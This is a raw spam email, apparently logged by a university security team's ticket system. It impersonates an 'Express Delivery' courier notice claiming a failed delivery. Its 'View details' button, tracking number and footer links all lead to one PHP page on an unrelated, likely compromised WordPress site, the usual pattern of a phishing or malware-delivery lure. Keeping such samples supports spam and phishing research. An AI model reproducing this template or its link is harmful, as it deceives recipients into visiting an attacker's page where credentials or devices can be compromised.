X-Filter-Version: 1.15 (minas)
From: "Express Delivery" <metallogenetic@v163-44-193-235.a002.g.han1.static.cnode.io>
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on minas.ics.muni.cz
X-Greylist: IP, sender and recipient auto-whitelisted, not delayed by milter-greylist-4.3.9 (minas.ics.muni.cz [147.251.4.35]); Sun, 06 Feb 2022 22:00:36 +0100 (CET)
Date: Mon, 7 Feb 2022 04:00:34 -0000
X-Virus-Status: Clean
X-Muni-O365-Test: metallogenetic@v163-44-193-235.a002.g.han1.static.cnode.io,csirt@muni.cz
X-Muni-Envelope-From: metallogenetic@v163-44-193-235.a002.g.han1.static.cnode.io
X-Spam-Level: **************************
Content-Transfer-Encoding: base64
KJBTVG-Cpse-Zsqdeukh: 7
X-Spam-Status: Yes, score=26.2 required=5.0 tests=DATE_IN_FUTURE_06_12, FH_HELO_EQ_D_D_D_D,HELO_DYNAMIC_IPADDR,HTML_MESSAGE,MIME_HTML_ONLY, RCVD_IN_BL_SPAMCOP_NET,RCVD_IN_PSBL,RCVD_IN_RP_RNBL,RCVD_IN_SORBS_SPAM, RCVD_IN_XBL,T_RP_MATCHES_RCVD autolearn=disabled version=3.3.2
X-Virus-Scanned: clamav-milter 0.99.4 at minas
To: csirt@muni.cz
Received: from minas.ics.muni.cz (minas.ics.muni.cz [147.251.4.46]) by rt.csirt.muni.cz (8.15.2/8.15.2/Debian-8+deb9u1) with ESMTP id 216L0f2v028292 for <rt@rt.csirt.muni.cz>; Sun, 6 Feb 2022 22:00:42 +0100
Received: from v163-44-193-235.a002.g.han1.static.cnode.io (v163-44-193-235.a002.g.han1.static.cnode.io [163.44.193.235]) by minas.ics.muni.cz (8.14.4/8.14.4/Debian-4+deb7u1) with ESMTP id 216L0Ros025204 for <csirt@muni.cz>; Sun, 6 Feb 2022 22:00:31 +0100
X-Muni-Spam-Testip: 163.44.193.235
content-type: text/html; charset="utf-8"
X-Muni-Envelope-To: csirt@muni.cz
Subject: Delivery ID58724918
X-RT-Incoming-Encryption: Not encrypted
HKHZ-Adbhyvl-Ujf: wbzj
X-Spam-Flag: YES
MIME-Version: 1.0
Message-ID: <3f3cef.6fb4_b5bfc37@v163-44-193-235.a002.g.han1.static.cnode.io>
From metallogenetic@v163-44-193-235.a002.g.han1.static.cnode.io Sun Feb  6 22:00:42 2022
X-RT-Original-Encoding: utf-8
X-RT-Interface: Email
Content-Length: 2478

<html> 
    
 
<head>    

 
 
   
 <title></title> 
  
    

 <style> 
   

   

    
 
 
  body {    
 
  font-family: arial;  

 

  
  font-size: 12pt;    font-weight: normal;   color: #000000;   }    h1 {   font-size: 36px;  
    
   
    
  font-style: italic;   font-weight: bold;   padding: 0px;   margin: 0px;   }    hr { 
 
  color: #c0c0c0; 

   
    
    
  }   
 
  
  span { 
  font-size: 11pt;

    

    
  color: #808080;  
  


    
  }   
 

  a { 
   
  
   
  color: #0088ff;   text-decoration: underline;
   
    

  }    
 

    
   
   
    
  div {   
   
    
 
  background: #f0f0f0;   padding: 10px;   }    .button {   
 
  
    
   
  display: inline-block; 

    
  padding: 8px 16px;   background-color: #ed2905;   color: #ffffff;
   
  
  font-size: 18px;
    


  font-weight: bold;    
    

  
  white-space: nowrap;   text-align: center;    
   
  
  text-decoration: none;   } 
 
   
  
 
  
 </style> </head> <body> 
 
   

 
 
 
  

<h1>Express Delivery</h1>     
    
    

 <br />   
    


<hr>  <br />  
 
  
   
<span> 2/07/2022
</span>   <br />   <br />     
   
   
    
    
Hi,    
    
   
   
  <br /> 
    
    

 
  <br /> 
    
   
<b> Our companys courier couldn't make the delivery. </b> 
 <br />   <br />  <a href="http://ozer.gen.tr/wp-content/bathrobesek.php?utm_source=5bfff&utm_content=9608b45a" class="button">
   
   
    
  
View details    
  
</a>   <br />    

    
  <br />  <b>  
   
   
Tracking information:   
    
 
</b>  
  
 
   

  <br />   <br />    
    


   
 <div> <a href="http://ozer.gen.tr/wp-content/bathrobesek.php?utm_source=5bfff&utm_content=9608b45a">ID58724918</a> </div>   <br />  
    
 <span>  
   
<a href="http://ozer.gen.tr/wp-content/bathrobesek.php?utm_source=5bfff&utm_content=9608b45a" style="color:#808080">Terms of Use</a> | <a href="http://ozer.gen.tr/wp-content/bathrobesek.php?utm_source=5bfff&utm_content=9608b45a" style="color:#808080">Privacy Notice</a> | <a href="http://ozer.gen.tr/wp-content/bathrobesek.php?utm_source=5bfff&utm_content=9608b45a" style="color:#808080">Terms and Conditions of Carriage</a>  <br />   <br /> This is an automated email please do not reply to this message.<br /> 
  
&copy; 2022 Express Delivery, LLC. </span>    
  
  
    
    
   
</body> 
    
</html> 